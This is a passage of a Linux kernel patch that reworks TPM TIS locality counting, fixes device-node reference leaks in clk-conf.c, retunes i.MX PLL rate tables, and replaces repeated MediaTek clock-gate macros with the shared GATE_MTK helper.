+@@ -1080,13 +1102,13 @@ int tpm_tis_core_init(struct device *dev, struct tpm_tis_data *priv, int irq,
+ 		 * proper timeouts for the driver.
+ 		 */
+ 
+-		rc = request_locality(chip, 0);
++		rc = tpm_tis_request_locality(chip, 0);
+ 		if (rc < 0)
+ 			goto out_err;
+ 
+ 		rc = tpm_get_timeouts(chip);
+ 
+-		release_locality(chip, 0);
++		tpm_tis_relinquish_locality(chip, 0);
+ 
+ 		if (rc) {
+ 			dev_err(dev, "Could not get TPM timeouts and durations\n");
+@@ -1094,17 +1116,21 @@ int tpm_tis_core_init(struct device *dev, struct tpm_tis_data *priv, int irq,
+ 			goto out_err;
+ 		}
+ 
+-		if (irq) {
++		if (irq)
+ 			tpm_tis_probe_irq_single(chip, intmask, IRQF_SHARED,
+ 						 irq);
+-			if (!(chip->flags & TPM_CHIP_FLAG_IRQ)) {
+-				dev_err(&chip->dev, FW_BUG
++		else
++			tpm_tis_probe_irq(chip, intmask);
++
++		if (!(chip->flags & TPM_CHIP_FLAG_IRQ)) {
++			dev_err(&chip->dev, FW_BUG
+ 					"TPM interrupt not working, polling instead\n");
+ 
+-				disable_interrupts(chip);
+-			}
+-		} else {
+-			tpm_tis_probe_irq(chip, intmask);
++			rc = tpm_tis_request_locality(chip, 0);
++			if (rc < 0)
++				goto out_err;
++			disable_interrupts(chip);
++			tpm_tis_relinquish_locality(chip, 0);
+ 		}
+ 	}
+ 
+@@ -1165,28 +1191,27 @@ int tpm_tis_resume(struct device *dev)
+ 	struct tpm_chip *chip = dev_get_drvdata(dev);
+ 	int ret;
+ 
++	ret = tpm_tis_request_locality(chip, 0);
++	if (ret < 0)
++		return ret;
++
+ 	if (chip->flags & TPM_CHIP_FLAG_IRQ)
+ 		tpm_tis_reenable_interrupts(chip);
+ 
+ 	ret = tpm_pm_resume(dev);
+ 	if (ret)
+-		return ret;
++		goto out;
+ 
+ 	/*
+ 	 * TPM 1.2 requires self-test on resume. This function actually returns
+ 	 * an error code but for unknown reason it isn't handled.
+ 	 */
+-	if (!(chip->flags & TPM_CHIP_FLAG_TPM2)) {
+-		ret = request_locality(chip, 0);
+-		if (ret < 0)
+-			return ret;
+-
++	if (!(chip->flags & TPM_CHIP_FLAG_TPM2))
+ 		tpm1_do_selftest(chip);
++out:
++	tpm_tis_relinquish_locality(chip, 0);
+ 
+-		release_locality(chip, 0);
+-	}
+-
+-	return 0;
++	return ret;
+ }
+ EXPORT_SYMBOL_GPL(tpm_tis_resume);
+ #endif
+diff --git a/drivers/char/tpm/tpm_tis_core.h b/drivers/char/tpm/tpm_tis_core.h
+index b68479e0de10f..1d51d5168fb6e 100644
+--- a/drivers/char/tpm/tpm_tis_core.h
++++ b/drivers/char/tpm/tpm_tis_core.h
+@@ -91,6 +91,8 @@ enum tpm_tis_flags {
+ 
+ struct tpm_tis_data {
+ 	u16 manufacturer_id;
++	struct mutex locality_count_mutex;
++	unsigned int locality_count;
+ 	int locality;
+ 	int irq;
+ 	bool irq_tested;
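The request/relinquish rework above reduces to a mutex-protected reference count: only the first requester claims the hardware locality, and only the last holder releases it (the kernel version additionally skips the increment when the hardware claim fails). A minimal user-space sketch of the same pattern, with illustrative names rather than the kernel's:

	#include <pthread.h>

	struct locality {
		pthread_mutex_t lock;	/* protects count */
		unsigned int count;	/* nested users of the locality */
	};

	static void hw_claim(void)   { /* would set the TPM_ACCESS request bit */ }
	static void hw_release(void) { /* would write TPM_ACCESS_ACTIVE_LOCALITY */ }

	static void locality_get(struct locality *l)
	{
		pthread_mutex_lock(&l->lock);
		if (l->count++ == 0)	/* first user claims the hardware */
			hw_claim();
		pthread_mutex_unlock(&l->lock);
	}

	static void locality_put(struct locality *l)
	{
		pthread_mutex_lock(&l->lock);
		if (--l->count == 0)	/* last user releases it */
			hw_release();
		pthread_mutex_unlock(&l->lock);
	}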
+diff --git a/drivers/clk/at91/clk-sam9x60-pll.c b/drivers/clk/at91/clk-sam9x60-pll.c
+index d757003004cbb..0882ed01d5c27 100644
+--- a/drivers/clk/at91/clk-sam9x60-pll.c
++++ b/drivers/clk/at91/clk-sam9x60-pll.c
+@@ -668,7 +668,7 @@ sam9x60_clk_register_frac_pll(struct regmap *regmap, spinlock_t *lock,
+ 
+ 		ret = sam9x60_frac_pll_compute_mul_frac(&frac->core, FCORE_MIN,
+ 							parent_rate, true);
+-		if (ret <= 0) {
++		if (ret < 0) {
+ 			hw = ERR_PTR(ret);
+ 			goto free;
+ 		}
+diff --git a/drivers/clk/clk-conf.c b/drivers/clk/clk-conf.c
+index 2ef819606c417..1a4e6340f95ce 100644
+--- a/drivers/clk/clk-conf.c
++++ b/drivers/clk/clk-conf.c
+@@ -33,9 +33,12 @@ static int __set_clk_parents(struct device_node *node, bool clk_supplier)
+ 			else
+ 				return rc;
+ 		}
+-		if (clkspec.np == node && !clk_supplier)
++		if (clkspec.np == node && !clk_supplier) {
++			of_node_put(clkspec.np);
+ 			return 0;
++		}
+ 		pclk = of_clk_get_from_provider(&clkspec);
++		of_node_put(clkspec.np);
+ 		if (IS_ERR(pclk)) {
+ 			if (PTR_ERR(pclk) != -EPROBE_DEFER)
+ 				pr_warn("clk: couldn't get parent clock %d for %pOF\n",
+@@ -48,10 +51,12 @@ static int __set_clk_parents(struct device_node *node, bool clk_supplier)
+ 		if (rc < 0)
+ 			goto err;
+ 		if (clkspec.np == node && !clk_supplier) {
++			of_node_put(clkspec.np);
+ 			rc = 0;
+ 			goto err;
+ 		}
+ 		clk = of_clk_get_from_provider(&clkspec);
++		of_node_put(clkspec.np);
+ 		if (IS_ERR(clk)) {
+ 			if (PTR_ERR(clk) != -EPROBE_DEFER)
+ 				pr_warn("clk: couldn't get assigned clock %d for %pOF\n",
+@@ -93,10 +98,13 @@ static int __set_clk_rates(struct device_node *node, bool clk_supplier)
+ 				else
+ 					return rc;
+ 			}
+-			if (clkspec.np == node && !clk_supplier)
++			if (clkspec.np == node && !clk_supplier) {
++				of_node_put(clkspec.np);
+ 				return 0;
++			}
+ 
+ 			clk = of_clk_get_from_provider(&clkspec);
++			of_node_put(clkspec.np);
+ 			if (IS_ERR(clk)) {
+ 				if (PTR_ERR(clk) != -EPROBE_DEFER)
+ 					pr_warn("clk: couldn't get clock %d for %pOF\n",
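Every clk-conf.c hunk in this patch fixes the same leak: of_parse_phandle_with_args() returns with a reference held on clkspec.np, so each early return and each path that has consumed the phandle must drop it. The rule in isolation, as a hedged sketch with a hypothetical helper name:

	#include <linux/clk.h>
	#include <linux/err.h>
	#include <linux/of.h>

	/* Hypothetical helper showing the refcount discipline fixed above. */
	static struct clk *get_assigned_clk(struct device_node *node, int index)
	{
		struct of_phandle_args clkspec;
		struct clk *clk;
		int rc;

		rc = of_parse_phandle_with_args(node, "assigned-clocks",
						"#clock-cells", index, &clkspec);
		if (rc)
			return ERR_PTR(rc);	/* parse failed: no reference taken */

		clk = of_clk_get_from_provider(&clkspec);
		of_node_put(clkspec.np);	/* drop the parser's reference */
		return clk;
	}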
+diff --git a/drivers/clk/imx/clk-fracn-gppll.c b/drivers/clk/imx/clk-fracn-gppll.c
+index a2aaa14fc1aef..f6674110a88e0 100644
+--- a/drivers/clk/imx/clk-fracn-gppll.c
++++ b/drivers/clk/imx/clk-fracn-gppll.c
+@@ -15,6 +15,7 @@
+ #include "clk.h"
+ 
+ #define PLL_CTRL		0x0
++#define HW_CTRL_SEL		BIT(16)
+ #define CLKMUX_BYPASS		BIT(2)
+ #define CLKMUX_EN		BIT(1)
+ #define POWERUP_MASK		BIT(0)
+@@ -60,18 +61,20 @@ struct clk_fracn_gppll {
+ };
+ 
+ /*
+- * Fvco = Fref * (MFI + MFN / MFD)
+- * Fout = Fvco / (rdiv * odiv)
++ * Fvco = (Fref / rdiv) * (MFI + MFN / MFD)
++ * Fout = Fvco / odiv
++ * The (Fref / rdiv) should be in the range 20 MHz to 40 MHz
++ * The Fvco should be in the range 2.5 GHz to 5 GHz
+  */
+ static const struct imx_fracn_gppll_rate_table fracn_tbl[] = {
+-	PLL_FRACN_GP(650000000U, 81, 0, 1, 0, 3),
++	PLL_FRACN_GP(650000000U, 162, 50, 100, 0, 6),
+ 	PLL_FRACN_GP(594000000U, 198, 0, 1, 0, 8),
+-	PLL_FRACN_GP(560000000U, 70, 0, 1, 0, 3),
+-	PLL_FRACN_GP(498000000U, 83, 0, 1, 0, 4),
++	PLL_FRACN_GP(560000000U, 140, 0, 1, 0, 6),
++	PLL_FRACN_GP(498000000U, 166, 0, 1, 0, 8),
+ 	PLL_FRACN_GP(484000000U, 121, 0, 1, 0, 6),
+ 	PLL_FRACN_GP(445333333U, 167, 0, 1, 0, 9),
+-	PLL_FRACN_GP(400000000U, 50, 0, 1, 0, 3),
+-	PLL_FRACN_GP(393216000U, 81, 92, 100, 0, 5)
++	PLL_FRACN_GP(400000000U, 200, 0, 1, 0, 12),
++	PLL_FRACN_GP(393216000U, 163, 84, 100, 0, 10)
+ };
+ 
+ struct imx_fracn_gppll_clk imx_fracn_gppll = {
+@@ -191,6 +194,11 @@ static int clk_fracn_gppll_set_rate(struct clk_hw *hw, unsigned long drate,
+ 
+ 	rate = imx_get_pll_settings(pll, drate);
+ 
++	/* Disable hardware control select: the PLL is controlled by register */
++	tmp = readl_relaxed(pll->base + PLL_CTRL);
++	tmp &= ~HW_CTRL_SEL;
++	writel_relaxed(tmp, pll->base + PLL_CTRL);
++
+ 	/* Disable output */
+ 	tmp = readl_relaxed(pll->base + PLL_CTRL);
+ 	tmp &= ~CLKMUX_EN;
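As a sanity check on the retuned fracn_tbl above, the new 650 MHz row can be pushed through the documented formula. The sketch below assumes a 24 MHz reference oscillator and treats the table's rdiv value of 0 as divide-by-1; both are assumptions for illustration, not stated by this patch.

	#include <stdio.h>

	int main(void)
	{
		const double fref = 24e6;	/* assumed 24 MHz reference */
		const double rdiv = 1.0;	/* table rdiv of 0 taken as /1 */
		const double mfi = 162.0, mfn = 50.0, mfd = 100.0, odiv = 6.0;
		const double fvco = (fref / rdiv) * (mfi + mfn / mfd);
		const double fout = fvco / odiv;

		/* Expect fvco = 3.9e9 (inside 2.5-5 GHz) and fout = 650 MHz. */
		printf("fvco=%.0f Hz, fout=%.0f Hz\n", fvco, fout);
		return 0;
	}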
+diff --git a/drivers/clk/imx/clk-imx8ulp.c b/drivers/clk/imx/clk-imx8ulp.c
+index 8eb1af2d64298..ca0e4a3aa454e 100644
+--- a/drivers/clk/imx/clk-imx8ulp.c
++++ b/drivers/clk/imx/clk-imx8ulp.c
+@@ -200,8 +200,8 @@ static int imx8ulp_clk_cgc1_init(struct platform_device *pdev)
+ 	clks[IMX8ULP_CLK_NIC_AD_DIVPLAT] = imx_clk_hw_divider_flags("nic_ad_divplat", "nic_sel", base + 0x34, 21, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
+ 	clks[IMX8ULP_CLK_NIC_PER_DIVPLAT] = imx_clk_hw_divider_flags("nic_per_divplat", "nic_ad_divplat", base + 0x34, 14, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
+ 	clks[IMX8ULP_CLK_XBAR_AD_DIVPLAT] = imx_clk_hw_divider_flags("xbar_ad_divplat", "nic_ad_divplat", base + 0x38, 14, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
+-	clks[IMX8ULP_CLK_XBAR_DIVBUS] = imx_clk_hw_divider_flags("xbar_divbus", "nic_ad_divplat", base + 0x38, 7, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
+-	clks[IMX8ULP_CLK_XBAR_AD_SLOW] = imx_clk_hw_divider_flags("xbar_ad_slow", "nic_ad_divplat", base + 0x38, 0, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
++	clks[IMX8ULP_CLK_XBAR_DIVBUS] = imx_clk_hw_divider_flags("xbar_divbus", "xbar_ad_divplat", base + 0x38, 7, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
++	clks[IMX8ULP_CLK_XBAR_AD_SLOW] = imx_clk_hw_divider_flags("xbar_ad_slow", "xbar_divbus", base + 0x38, 0, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
+ 
+ 	clks[IMX8ULP_CLK_SOSC_DIV1_GATE] = imx_clk_hw_gate_dis("sosc_div1_gate", "sosc", base + 0x108, 7);
+ 	clks[IMX8ULP_CLK_SOSC_DIV2_GATE] = imx_clk_hw_gate_dis("sosc_div2_gate", "sosc", base + 0x108, 15);
+diff --git a/drivers/clk/mediatek/clk-mt2701-aud.c b/drivers/clk/mediatek/clk-mt2701-aud.c
+index 6ba398eb7df91..4287bd3f545ee 100644
+--- a/drivers/clk/mediatek/clk-mt2701-aud.c
++++ b/drivers/clk/mediatek/clk-mt2701-aud.c
+@@ -15,41 +15,17 @@
+ 
+ #include <dt-bindings/clock/mt2701-clk.h>
+ 
+-#define GATE_AUDIO0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO0(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO1(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO2(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio2_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO3(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio3_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO3(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio3_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate_regs audio0_cg_regs = {
+ 	.set_ofs = 0x0,
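This and the following MediaTek hunks all collapse open-coded struct mtk_gate initializers into the shared GATE_MTK()/GATE_MTK_FLAGS() helpers. The helpers presumably expand to the same initializer being deleted; the shape below follows drivers/clk/mediatek/clk-gate.h as best recalled, and is shown for reference only, not as part of this patch.

	#define GATE_MTK_FLAGS(_id, _name, _parent, _regs, _shift, _ops, _flags) {	\
			.id = _id,						\
			.name = _name,						\
			.parent_name = _parent,					\
			.regs = _regs,						\
			.shift = _shift,					\
			.ops = _ops,						\
			.flags = _flags,					\
		}

	#define GATE_MTK(_id, _name, _parent, _regs, _shift, _ops)			\
		GATE_MTK_FLAGS(_id, _name, _parent, _regs, _shift, _ops, 0)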
+diff --git a/drivers/clk/mediatek/clk-mt2701-bdp.c b/drivers/clk/mediatek/clk-mt2701-bdp.c
+index 435ed4819d563..b0f0572079452 100644
+--- a/drivers/clk/mediatek/clk-mt2701-bdp.c
++++ b/drivers/clk/mediatek/clk-mt2701-bdp.c
+@@ -24,23 +24,11 @@ static const struct mtk_gate_regs bdp1_cg_regs = {
+ 	.sta_ofs = 0x0110,
+ };
+ 
+-#define GATE_BDP0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &bdp0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_BDP0(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &bdp0_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_BDP1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &bdp1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_BDP1(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &bdp1_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate bdp_clks[] = {
+ 	GATE_BDP0(CLK_BDP_BRG_BA, "brg_baclk", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2701-eth.c b/drivers/clk/mediatek/clk-mt2701-eth.c
+index edf1e2ed2b596..601358748750e 100644
+--- a/drivers/clk/mediatek/clk-mt2701-eth.c
++++ b/drivers/clk/mediatek/clk-mt2701-eth.c
+@@ -16,14 +16,8 @@ static const struct mtk_gate_regs eth_cg_regs = {
+ 	.sta_ofs = 0x0030,
+ };
+ 
+-#define GATE_ETH(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &eth_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_ETH(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &eth_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate eth_clks[] = {
+ 	GATE_ETH(CLK_ETHSYS_HSDMA, "hsdma_clk", "ethif_sel", 5),
+diff --git a/drivers/clk/mediatek/clk-mt2701-g3d.c b/drivers/clk/mediatek/clk-mt2701-g3d.c
+index 1458109d99d94..8d1fc8e3336eb 100644
+--- a/drivers/clk/mediatek/clk-mt2701-g3d.c
++++ b/drivers/clk/mediatek/clk-mt2701-g3d.c
+@@ -16,14 +16,8 @@
+ 
+ #include <dt-bindings/clock/mt2701-clk.h>
+ 
+-#define GATE_G3D(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &g3d_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_G3D(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &g3d_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate_regs g3d_cg_regs = {
+ 	.sta_ofs = 0x0,
+diff --git a/drivers/clk/mediatek/clk-mt2701-hif.c b/drivers/clk/mediatek/clk-mt2701-hif.c
+index 434cbbe8c0371..edeeb033a2350 100644
+--- a/drivers/clk/mediatek/clk-mt2701-hif.c
++++ b/drivers/clk/mediatek/clk-mt2701-hif.c
+@@ -16,14 +16,8 @@ static const struct mtk_gate_regs hif_cg_regs = {
+ 	.sta_ofs = 0x0030,
+ };
+ 
+-#define GATE_HIF(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &hif_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_HIF(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &hif_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate hif_clks[] = {
+ 	GATE_HIF(CLK_HIFSYS_USB0PHY, "usb0_phy_clk", "ethpll_500m_ck", 21),
+diff --git a/drivers/clk/mediatek/clk-mt2701-img.c b/drivers/clk/mediatek/clk-mt2701-img.c
+index 7e53deb7f9905..eb172473f0755 100644
+--- a/drivers/clk/mediatek/clk-mt2701-img.c
++++ b/drivers/clk/mediatek/clk-mt2701-img.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs img_cg_regs = {
+ 	.sta_ofs = 0x0000,
+ };
+ 
+-#define GATE_IMG(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &img_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IMG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &img_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate img_clks[] = {
+ 	GATE_IMG(CLK_IMG_SMI_COMM, "img_smi_comm", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2701-mm.c b/drivers/clk/mediatek/clk-mt2701-mm.c
+index 9ea7abad99d23..eb069f3bc9a2b 100644
+--- a/drivers/clk/mediatek/clk-mt2701-mm.c
++++ b/drivers/clk/mediatek/clk-mt2701-mm.c
+@@ -24,23 +24,11 @@ static const struct mtk_gate_regs disp1_cg_regs = {
+ 	.sta_ofs = 0x0110,
+ };
+ 
+-#define GATE_DISP0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &disp0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_DISP0(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &disp0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_DISP1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &disp1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_DISP1(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &disp1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mm_clks[] = {
+ 	GATE_DISP0(CLK_MM_SMI_COMMON, "mm_smi_comm", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2701-vdec.c b/drivers/clk/mediatek/clk-mt2701-vdec.c
+index d3089da0ab62e..0f07c5d731df6 100644
+--- a/drivers/clk/mediatek/clk-mt2701-vdec.c
++++ b/drivers/clk/mediatek/clk-mt2701-vdec.c
+@@ -24,23 +24,11 @@ static const struct mtk_gate_regs vdec1_cg_regs = {
+ 	.sta_ofs = 0x0008,
+ };
+ 
+-#define GATE_VDEC0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &vdec0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VDEC0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &vdec0_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_VDEC1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &vdec1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VDEC1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &vdec1_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate vdec_clks[] = {
+ 	GATE_VDEC0(CLK_VDEC_CKGEN, "vdec_cken", "vdec_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2701.c b/drivers/clk/mediatek/clk-mt2701.c
+index 9b442af37e672..1c3a93143dc5e 100644
+--- a/drivers/clk/mediatek/clk-mt2701.c
++++ b/drivers/clk/mediatek/clk-mt2701.c
+@@ -636,14 +636,8 @@ static const struct mtk_gate_regs top_aud_cg_regs = {
+ 	.sta_ofs = 0x012C,
+ };
+ 
+-#define GATE_TOP_AUD(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top_aud_cg_regs,		\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_TOP_AUD(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &top_aud_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate top_clks[] = {
+ 	GATE_TOP_AUD(CLK_TOP_AUD_48K_TIMING, "a1sys_hp_ck", "aud_mux1_div",
+@@ -701,14 +695,8 @@ static const struct mtk_gate_regs infra_cg_regs = {
+ 	.sta_ofs = 0x0048,
+ };
+ 
+-#define GATE_ICG(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &infra_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_ICG(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate infra_clks[] = {
+ 	GATE_ICG(CLK_INFRA_DBG, "dbgclk", "axi_sel", 0),
+@@ -822,23 +810,11 @@ static const struct mtk_gate_regs peri1_cg_regs = {
+ 	.sta_ofs = 0x001c,
+ };
+ 
+-#define GATE_PERI0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_PERI0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_PERI1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate peri_clks[] = {
+ 	GATE_PERI0(CLK_PERI_USB0_MCU, "usb0_mcu_ck", "axi_sel", 31),
+diff --git a/drivers/clk/mediatek/clk-mt2712-bdp.c b/drivers/clk/mediatek/clk-mt2712-bdp.c
+index 684d03e9f6de1..5e668651dd901 100644
+--- a/drivers/clk/mediatek/clk-mt2712-bdp.c
++++ b/drivers/clk/mediatek/clk-mt2712-bdp.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs bdp_cg_regs = {
+ 	.sta_ofs = 0x100,
+ };
+ 
+-#define GATE_BDP(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &bdp_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_BDP(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &bdp_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate bdp_clks[] = {
+ 	GATE_BDP(CLK_BDP_BRIDGE_B, "bdp_bridge_b", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2712-img.c b/drivers/clk/mediatek/clk-mt2712-img.c
+index 335049cdc856c..3ffa51384e6b2 100644
+--- a/drivers/clk/mediatek/clk-mt2712-img.c
++++ b/drivers/clk/mediatek/clk-mt2712-img.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs img_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_IMG(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &img_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_IMG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &img_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate img_clks[] = {
+ 	GATE_IMG(CLK_IMG_SMI_LARB2, "img_smi_larb2", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2712-jpgdec.c b/drivers/clk/mediatek/clk-mt2712-jpgdec.c
+index 07ba7c5e80aff..8c768d5ce24d5 100644
+--- a/drivers/clk/mediatek/clk-mt2712-jpgdec.c
++++ b/drivers/clk/mediatek/clk-mt2712-jpgdec.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs jpgdec_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_JPGDEC(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &jpgdec_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_JPGDEC(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &jpgdec_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
